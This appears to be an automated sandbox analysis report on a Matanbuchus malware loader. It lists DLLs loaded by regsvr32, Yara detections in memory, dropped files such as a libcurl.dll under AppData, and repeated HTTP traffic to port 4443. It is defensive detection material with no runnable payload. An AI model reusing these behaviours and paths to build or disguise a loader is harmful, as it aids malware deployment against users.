Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Data Obfuscation

Yara detected Matanbuchus

Source: Yara match	File source: 16.2.regsvr32.exe.6beb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.regsvr32.exe.6beb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.6beb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6c530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.6beb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.6beb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.7f150000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.7f3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.7f4b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.7f4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7eed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.7ee00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.7f150000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7eed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.7f3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.7ee00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4167344781.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\8f08\701188\701188.winmd, type: DROPPED

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE61116 push ecx; ret	4_2_7EE61129
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEFB37E push cs; retf 0002h	6_2_7EEFB37F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF31116 push ecx; ret	6_2_7EF31129
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4DB37E push cs; retf 0002h	11_2_7F4DB37F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F511116 push ecx; ret	11_2_7F511129
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17B37E push cs; retf 0002h	14_2_7F17B37F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1B1116 push ecx; ret	14_2_7F1B1129

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\8f08\701188\701188.winmd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEF45.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\silver\libcurl.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF014.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFA4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFD4.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEF45.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF014.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFA4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFD4.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08\701188\701188.winmd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50134

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
